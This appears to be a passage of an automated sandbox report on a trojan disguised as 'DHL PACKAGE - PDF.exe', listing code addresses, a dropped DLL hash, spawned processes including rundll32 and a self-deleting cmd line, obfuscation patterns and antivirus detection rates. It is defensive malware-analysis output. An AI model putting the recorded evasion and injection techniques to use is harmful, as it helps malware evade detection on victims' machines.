 Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Code function: 0_2_00406943 0_2_00406943 Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Code function: 0_2_0040711A 0_2_0040711A Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_100042CB 2_2_100042CB Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041D028 4_2_0041D028 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00401030 4_2_00401030 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041D8D1 4_2_0041D8D1 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041BD62 4_2_0041BD62 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00402D88 4_2_00402D88 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00402D90 4_2_00402D90 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00409E2C 4_2_00409E2C Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00409E30 4_2_00409E30 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041E72D 4_2_0041E72D Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00402FB0 4_2_00402FB0 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_05010D20 4_2_05010D20 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_050E1D55 4_2_050E1D55 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_05036E30 4_2_05036E30 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0501F900 4_2_0501F900 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_050D1002 4_2_050D1002 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0502B090 4_2_0502B090 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0504EBB0 4_2_0504EBB0 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_0388DBD2 20_2_0388DBD2 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_03892B28 20_2_03892B28 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_037FEBB0 20_2_037FEBB0 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_038922AE 20_2_038922AE Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_037E4120 20_2_037E4120 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_037CF900 20_2_037CF900 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_038920A8 20_2_038920A8 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_038928EC 20_2_038928EC Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_03881002 20_2_03881002 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_0389E824 20_2_0389E824 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_037F20A0 20_2_037F20A0 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_037DB090 20_2_037DB090 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_03891FF1 20_2_03891FF1 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_037E6E30 20_2_037E6E30 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_03892EF7 20_2_03892EF7 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_0388D616 20_2_0388D616 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_038925DD 20_2_038925DD Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_037C0D20 20_2_037C0D20 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_03892D07 20_2_03892D07 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_037DD5E0 20_2_037DD5E0 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_03891D55 20_2_03891D55 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_037F2581 20_2_037F2581 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_037D841F 20_2_037D841F Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_0388D466 20_2_0388D466 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DD2D90 20_2_00DD2D90 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DD2D88 20_2_00DD2D88 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DEBD62 20_2_00DEBD62 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DD9E30 20_2_00DD9E30 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DD9E2C 20_2_00DD9E2C Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DD2FB0 20_2_00DD2FB0 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DEE72D 20_2_00DEE72D
 Dropped file seen in connection with other malware Show sources
 Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\SitulaCystocele.dll 18E86106E60613594527C85FE6C97287FC8C3715181A62CB2B4D2258C210B6C8
 Found potential string decryption / allocating functions Show sources
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 037CB150 appears 35 times
 PE file contains strange resources Show sources
 Source: DHL PACKAGE - PDF.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST Source: DHL PACKAGE - PDF.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Tries to load missing DLLs Show sources
 Yara signature match Show sources
 Classification label Show sources
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@12/22@2/2
 Contains functionality to adjust token privileges (e.g. debug / backup) Show sources
 Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Code function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004033A9
 Contains functionality to check free disk space Show sources
 Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Code function: 0_2_00404686 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_00404686
 Contains functionality to instantiate COM classes Show sources
 Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Code function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar, 0_2_00402138
 Creates files inside the user directory Show sources
 Creates mutexes Show sources
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_01
 Creates temporary files Show sources
 PE file has an executable .text section and no other executable section Show sources
 Source: DHL PACKAGE - PDF.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Reads the hosts file Show sources
 Runs a DLL by calling functions Show sources
 Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe SitulaCystocele,Hurley
 Sample is known by Antivirus Show sources
 Source: DHL PACKAGE - PDF.exe Virustotal: Detection: 49% Source: DHL PACKAGE - PDF.exe ReversingLabs: Detection: 33%
 Sample reads its own file content Show sources
 Spawns processes Show sources
 Source: unknown Process created: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe 'C:\Users\user\Desktop\DHL PACKAGE - PDF.exe' Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe SitulaCystocele,Hurley Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe Source: unknown Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe' Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe SitulaCystocele,Hurley Jump to behavior Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe Jump to behavior Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe Jump to behavior Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe' Jump to behavior
 Uses an in-process (OLE) Automation server Show sources
 Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
 Writes ini files Show sources
 Checks if Microsoft Office is installed Show sources
 Contains modern PE file flags such as dynamic base (ASLR) or NX Show sources
 Source: DHL PACKAGE - PDF.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
 Binary contains paths to debug symbols Show sources
 Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000009.00000000.312329674.000000000DDE0000.00000002.00000001.sdmp Source: Binary string: f:\binaries.x86ret\bin\i386\bbt\opt\bin\i386\vsa7director.pdb source: Vsa7Director.dll.0.dr Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000004.00000002.346057255.000000000510F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000014.00000002.506606875.00000000038BF000.00000040.00000001.sdmp Source: Binary string: cmd.pdbUGP source: NETSTAT.EXE, 00000014.00000002.504500510.000000000350D000.00000004.00000020.sdmp Source: Binary string: wntdll.pdb source: cmd.exe, NETSTAT.EXE Source: Binary string: Microsoft.XslDebugProxy.pdb source: nsxD96C.tmp.0.dr Source: Binary string: PermCalc.pdb source: nsxD96C.tmp.0.dr Source: Binary string: ActiveSyncBootstrap.pdb source: ActiveSyncBootstrap.dll.0.dr Source: Binary string: cmd.pdb source: NETSTAT.EXE, 00000014.00000002.504500510.000000000350D000.00000004.00000020.sdmp Source: Binary string: wscui.pdb source: explorer.exe, 00000009.00000000.312329674.000000000DDE0000.00000002.00000001.sdmp
 Contains functionality to dynamically determine API calls Show sources
 Uses code obfuscation techniques (call, push, ret) Show sources
 Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_10002EED push ecx; ret 2_2_10002F00 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_004178F7 pushfd ; iretd 4_2_004178FE Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00414D4C pushad ; iretd 4_2_00414D4D Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041CDE5 push eax; ret 4_2_0041CE38 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_004085A9 push esi; iretd 4_2_004085AD Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041CE32 push eax; ret 4_2_0041CE38 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041CE3B push eax; ret 4_2_0041CEA2 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041E6E0 push dword ptr [494A20F8h]; ret 4_2_0041E72B Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041CE9C push eax; ret 4_2_0041CEA2 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041DFF3 push es; ret 4_2_0041DFFC Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00416FF8 pushfd ; ret 4_2_0041709A Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00416FA0 pushfd ; ret 4_2_0041709A Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0506D0D1 push ecx; ret 4_2_0506D0E4 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_0381D0D1 push ecx; ret 20_2_0381D0E4 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DE78F7 pushfd ; iretd 20_2_00DE78FE Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DEDA51 push ss; retf 20_2_00DEDA5A Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DECDE5 push eax; ret 20_2_00DECE38 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DD85A9 push esi; iretd 20_2_00DD85AD Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DE4D4C pushad ; iretd 20_2_00DE4D4D Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DEE6E0 push dword ptr [494A20F8h]; ret 20_2_00DEE72B Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DECE9C push eax; ret 20_2_00DECEA2 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DECE3B push eax; ret 20_2_00DECEA2 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DECE32 push eax; ret 20_2_00DECE38 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DE6FF8 pushfd ; ret 20_2_00DE709A Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DE6FA0 pushfd ; ret 20_2_00DE709A Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DED741 pushad ; iretd 20_2_00DED6F5
 Drops PE files Show sources